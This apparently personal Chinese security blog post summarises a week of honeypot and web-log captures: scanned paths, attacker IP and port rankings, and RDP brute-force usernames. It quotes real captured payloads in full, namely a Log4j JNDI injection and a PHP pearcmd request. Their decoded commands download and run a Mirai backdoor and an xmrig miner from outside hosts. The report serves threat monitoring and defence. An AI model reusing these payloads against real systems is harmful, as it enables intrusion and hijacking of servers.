2023-08-01 防火墙日志汇总报告

博主： zmx
发布时间：2023 年 08 月 01 日
688 次浏览
暂无评论
11920字数
分类：网络威胁报告

# 总览

数据集日期范围：`2023-07-24` 至 `2023-08-01`
数据集采样范围：蜜罐系统、Web应用日志

# 捕获情况

## web日志

### 地址爆破路径

/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/wp-login.php
/1.php
/phpmyadmin
/ReportServer
/aaa9
/aaa8
/?action=checkLatest
/boaform/admin/formLogin
/.git/config
/.git/index
/YUu9
/eGlE
login.cgi
/admin-app/.env
/back/.env
/cms/.env
/apps/.env
/private/.env
/live_env
/core/.env
/.env.dist
/.env.development
/.env.project
/.env.old
/local/.env
/docker/.env
/shared/.env
/application/.env
/app/.env
/script/.env
/api/.env
/system/.env
/rest/.env
/sources/.env
/cp/.env
/fedex/.env
/laravel/.env
/debug/default/view?panel=config
/frontend_dev.php/$
/?phpinfo=1
/_profiler/phpinfo
/.json
enviroments/.env
/beian.htm
/blog/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/website/wp-includes/wlwmanifest.xml
/news/wp-includes/wlwmanifest.xml
/wp1/wp-includes/wlwmanifest.xml
/sito/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/wp2/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/?a=fetch&content=`<php>`die(@md5(HelloThinkCMF))`</php>`

### log4j UA体

```
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')
```

#### 解析

⚠：此文件包含病毒`Backdoor/Linux.Mirai.ck`

wget -o /tmp/boxshell3 http://172.245.135.175/server/boxshell3 ; curl -o /tmp/boxshell3 http://172.245.135.175/server/boxshell3 ; chmod +x /tmp/boxshell3 ; chmod 777 /tmp/boxshell3 ; /tmp/boxshell3 x86 ; rm -rf /tmp/boxshell3

## 蜜罐捕获

样本数：108402

### IP排名

| IP地址    | 捕获次数 |
| --------------- | ---- |
| 87.251.64.11    | 5929 |
| 89.248.163.212  | 3550 |
| 45.135.232.28   | 2552 |
| 89.248.165.95   | 2144 |
| 141.98.11.119   | 2098 |
| 36.99.136.129   | 1999 |
| 36.99.136.128   | 1991 |
| 36.99.136.136   | 1988 |
| 36.99.136.137   | 1929 |
| 111.7.96.151    | 1916 |
| 111.7.96.150    | 1642 |
| 89.248.163.96   | 1595 |
| 89.248.163.224  | 1568 |
| 123.160.221.16  | 1374 |
| 123.160.221.14  | 1318 |
| 123.160.221.20  | 1310 |
| 111.7.96.149    | 1254 |
| 111.7.96.148    | 1194 |
| 123.160.221.18  | 1193 |
| 111.7.96.147    | 1177 |
| 95.214.53.99    | 1107 |
| 185.81.68.65    | 912  |
| 183.136.225.31  | 697  |
| 185.161.248.31  | 670  |
| 89.248.165.228  | 651  |
| 89.248.165.14   | 600  |
| 89.248.163.203  | 580  |
| 176.113.115.230 | 570  |
| 89.248.165.106  | 522  |
| 80.66.88.14     | 519  |
| 178.159.37.98   | 519  |

### 端口排名

| 端口号    | 捕获次数 |
| --------------- | ---- |
| 1433   | 1108     |
| 8080   | 757      |
| 8443   | 502      |
| 8081   | 364      |
| 9200   | 356      |
| 5060   | 350      |
| 5555   | 299      |
| 8888   | 296      |
| 4433   | 265      |
| 3000   | 261      |
| 9090   | 261      |
| 23     | 254      |
| 2375   | 251      |
| 554    | 250      |
| 9000   | 248      |
| 102    | 238      |
| 2222   | 231      |
| 25     | 227      |
| 7777   | 224      |
| 82     | 218      |
| 2096   | 207      |
| 5432   | 207      |
| 3128   | 206      |

### （xmrig）挖矿特征

#### php语言

```php
GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzEwOS4yMDYuMjQyLjI1MS9kb3dubG9hZC94bXJpZy54ODZfNjQ7IG12IHhtcmlnLng4Nl82NCAuZm94bTsgY2htb2QgK3ggLmZveG07IC4vLmZveG07IGVjaG8gRG9udEdldE1hZE9r"));?>+/tmp/ohhellohttpserver.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: zh-CN,zh;q=0.9\r\nConnection: keep-alive\r\nHost: ***:8090\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-HttpClient\r\n\r\n```
```

解析后：

```bash
pkill -9 .foxm; cd /tmp; wget http://109.206.242.251/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm; echo DontGetMadOk
```

#### log4j漏洞

```bash
GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nReferer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBy

GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')\r\nReferer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBy
```

### RDP 爆破用户名

| 用户名 |
| --------------- |
| Administr     |
| Administrator |
| nmap          |
| beio          |
| Administrator |
| GWTAdmin      |
| hello         |
| PEebYQNNF     |
| PQhTjQ        |
| aRxCgF        |
| KtXbvfPUW     |
| zZxJLr        |
| VbzFal        |
| PvfgFrsfi     |
| UmqaDS        |
| kVRSAn        |
| eltons        |
| kvEqHQGKT     |
| cgLHpE        |
| tzJGsH        |
| Domain        |
| CJPXfaPRy     |
| cudTCe        |
| PUwPLD        |
| OGECIOAO      |
| BSKHDOXE      |
| LSPISXGM      |
| UEAVQWLY      |
| MGDZRKCA      |
| ZUNYZGDK      |
| CFRWUOSC      |
| NGRHWNQT      |
| SEFEHPSZ      |
| PFGQQRKE      |
| NOZZZHKO      |
| DOVOBFWY      |
| IGXQUPDU      |
| WPFEGKCJ      |
| DULIDYTA      |
| UHSEDFSB      |
| JJWUNTLB      |
| OMNUMIQU      |
| BTZGWXIK      |
| MKXPQJKM      |
| DWXPZAYP      |
| GLRQEKAM      |
| DPYRJGNK      |
| YSWYXWMC      |
| TAJYUGXV      |
| NUGHEMWL      |
| FFQBOAAB      |
| HVDCVRCL      |
| NAZRYDUU      |
| KCUHKSPL      |
| RRYMOMGH      |
| KAPKPUSY      |
| NZGJCJVJ      |
| FYIGKOMV      |
| ITAEKYAU      |
| OTMTGKOT      |
| QOZONXRJ      |
| LYCJACHK      |
| WQZCIHLT      |
| VZMKZAXW      |
| EBCWOAXH      |
| QMCWGRQQ      |
| QXRDGICU      |
| USLSASKP      |
| RVFZBLFO      |
| NSIXJXNV      |
| KGPQNNTW      |
| URVUQHNM      |
| MFIOJOHC      |
| SKLMJPHO      |
| IDNHQBKE      |
| HQVQFJBV      |
| VHIPZLKT      |
| QEDJGHGZ      |
| UYFMPZAO      |
| UVPIVFKI      |
| TDUAPAQT      |
| TQCNBDIK      |
| GMCDLUNS      |
| VHHLNDGG      |
| KDJSRPYS      |
| UKVJNDJV      |
| FLJVEBFQ      |
| VWODOWJM      |
| EBVRHMXN      |
| PNVVWZCU      |
| ETYKNUDQ      |
| HPYTNHWB      |
| KBUNTMPA      |
| ZMWFPGCW      |
| XQEXWAFW      |
| VBEEEJIB      |
| ERPWJGMR      |
| YXEXBLGO      |
| USKGQRJX      |
| CBCPUTYF      |
| FHOZVYQH      |
| GSBQPNGJ      |
| YIRURENP      |
| AHGLHCFH      |
| OGTWGVIF      |
| YXORHMLZ      |
| NRKQWUJQ      |
| OHXCCNOY      |
| GWXUDSMH      |
| HAOQTEOZ      |
| FSVVVALA      |
| OOVLIWJG      |
| MEASHMRH      |
| HHULLPGR      |
| BNJIBNDW      |
| LeXJbyfrX     |
| gqZIpZ        |
| dGgaAz        |
| WMZcFcjdk     |
| eyCbYw        |
| DXcrLn        |
| oLjnOgtLY     |
| teXprq        |
| hUaLal        |
| vHObTLybq     |
| gykdTe        |
| JdHzOj        |
| bLPEIBXUL     |
| uqGmeT        |
| NUfLxy        |
| rqbZpjpmf     |
| oFEEFJ        |
| bsjwUL        |
| sTdFwlgba     |
| EQxPDk        |
| TZyctM        |
| EJmwkPCgX     |
| gGVsLa        |
| EWTjDm        |
| UbTymobYq     |
| VLrabv        |
| seHSqz        |
| qlQzpJALa     |
| fpdjRW        |
| jJqauH        |
| XerNVKOqh     |
| SgGiTk        |
| glIlXj        |
| csKMakWjc     |
| TeRLIV        |
| mdEygB        |
| mnsLeXOgZ     |
| peAMKJ        |
| gPSzlj        |
| BNbueBMzo     |
| MfcKiX        |
| OCpRkF        |
| ViZmgJiKn     |
| BfNHaP        |
| sgUAGf        |
| lcJyGGSsD     |
| wXQlAZ        |
| CclGyG        |
| jLdAsOlEg     |
| bnkQYL        |
| dueIpb        |
| SDuZkyoNU     |
| ntGcZu        |
| yFQPFH        |
| root          |
| HFbMJGPXd     |
| KEOHOf        |
| ioGMIl        |
| pmZAMgSfm     |
| UZJCOx        |
| OZGcmt        |
| XhQYTmPfx     |
| bZqQcX        |
| RCtPdF        |
| uJToAGOds     |
| aveZKm        |
| LjIeoi        |
| UtpJXAieb     |
| RVLgVA        |
| ShaUWE        |

## 综合汇总

| IP   | 类型 | 数量  |
| ---------------- | -------- | ---- |
| 89.248.163.212   | 蜜罐捕获 | 108  |
| 220.196.160.0/24 | web日志  | 71   |
| 141.98.11.119    | 蜜罐捕获 | 65   |
| 89.248.163.96    | 蜜罐捕获 | 50   |
| 89.248.163.224   | 蜜罐捕获 | 48   |
| 180.101.245.0/24 | web日志  | 29   |
| 185.81.68.65     | 蜜罐捕获 | 28   |
| 36.99.136.136    | 蜜罐捕获 | 21   |
| 36.99.136.129    | 蜜罐捕获 | 20   |
| 178.159.37.98    | 蜜罐捕获 | 16   |
| 36.99.136.137    | 蜜罐捕获 | 16   |
| 80.66.88.14      | 蜜罐捕获 | 16   |
| 141.98.11.58     | 蜜罐捕获 | 14   |
| 36.99.136.128    | 蜜罐捕获 | 12   |
| 59.83.208.0/24   | web日志  | 12   |
| 87.251.64.11     | 蜜罐捕获 | 11   |
| 176.113.115.230  | 蜜罐捕获 | 10   |
| 45.93.201.57     | 蜜罐捕获 | 8    |
| 117.187.173.84   | 蜜罐捕获 | 7    |
| 117.187.173.96   | 蜜罐捕获 | 7    |
| 180.101.244.0/24 | web日志  | 7    |
| 3.227.252.118    | web日志  | 7    |
| 117.187.173.100  | 蜜罐捕获 | 6    |
| 117.187.173.102  | 蜜罐捕获 | 6    |
| 117.187.173.40   | 蜜罐捕获 | 6    |
| 117.187.173.42   | 蜜罐捕获 | 6    |
| 176.113.115.241  | 蜜罐捕获 | 6    |
| 117.187.173.112  | 蜜罐捕获 | 5    |
| 117.187.173.120  | 蜜罐捕获 | 5    |
| 117.187.173.43   | 蜜罐捕获 | 5    |
| 117.187.173.46   | 蜜罐捕获 | 5    |
| 117.187.173.69   | 蜜罐捕获 | 5    |
| 117.187.173.71   | 蜜罐捕获 | 5    |
| 117.187.173.83   | 蜜罐捕获 | 5    |
| 117.187.173.88   | 蜜罐捕获 | 5    |
| 117.187.173.97   | 蜜罐捕获 | 5    |
| 89.248.165.95    | 蜜罐捕获 | 5    |
| 107.172.5.251    | 页面枚举 | 3    |
| 20.235.49.124    | 页面枚举 | 2    |
| 213.226.123.100  | 蜜罐捕获 | 2    |
| 66.249.68.69     | 页面枚举 | 2    |
| 80.66.88.19      | 蜜罐捕获 | 2    |
| 101.132.194.222  | 蜜罐捕获 | 1    |
| 101.37.31.36     | 页面枚举 | 1    |
| 104.248.191.58   | 蜜罐捕获 | 1    |
| 104.248.79.33    | 蜜罐捕获 | 1    |
| 106.3.146.200    | 蜜罐捕获 | 1    |
| 106.91.5.195     | 页面枚举 | 1    |
| 107.172.83.34    | 页面枚举 | 1    |

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

zunmx.fans
我 www.hao123.com实名申请友链OωO
zunmx.fans
作者小小骗人，我登陆了也看不到( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
zunmx.fans
please many update 算法 (´இ皿இ｀)boke
zunmx.fans
df1/df2 df1+df2 转置，累加----*。。。...
zunmx.fans
为何无人评论？OωO

2023-08-01 防火墙日志汇总报告

zmx • 2023 年 08 月 01 日

# 总览

数据集日期范围：`2023-07-24` 至 `2023-08-01`
数据集采样范围：蜜罐系统、Web应用日志

# 捕获情况

## web日志

### 地址爆破路径

### log4j UA体

#### 解析

⚠：此文件包含病毒`Backdoor/Linux.Mirai.ck`

## 蜜罐捕获

样本数：108402

### IP排名

### 端口排名

### （xmrig）挖矿特征

#### php语言

解析后：

```bash
pkill -9 .foxm; cd /tmp; wget http://109.206.242.251/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm; echo DontGetMadOk
```

#### log4j漏洞

### RDP 爆破用户名

## 综合汇总

2023-08-01 防火墙日志汇总报告

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。

Typecho 插件开发 ZSecurity

个人空间使用规则[拟定] 23/3/9修订

企业微信-摸鱼必备，避免离开状态

基于Lively wallpaper的壁纸

中公教育CTS视频下载

SpringBoot Controller 自定义注解

fail2ban nginx 404 403 拦截

python 解析docx文件

python 生成一个区间内均匀取点的列表

newoj测评题库，自己解答的源码。

2023-08-01 防火墙日志汇总报告

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。

2023-08-01 防火墙日志汇总报告

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款了昂。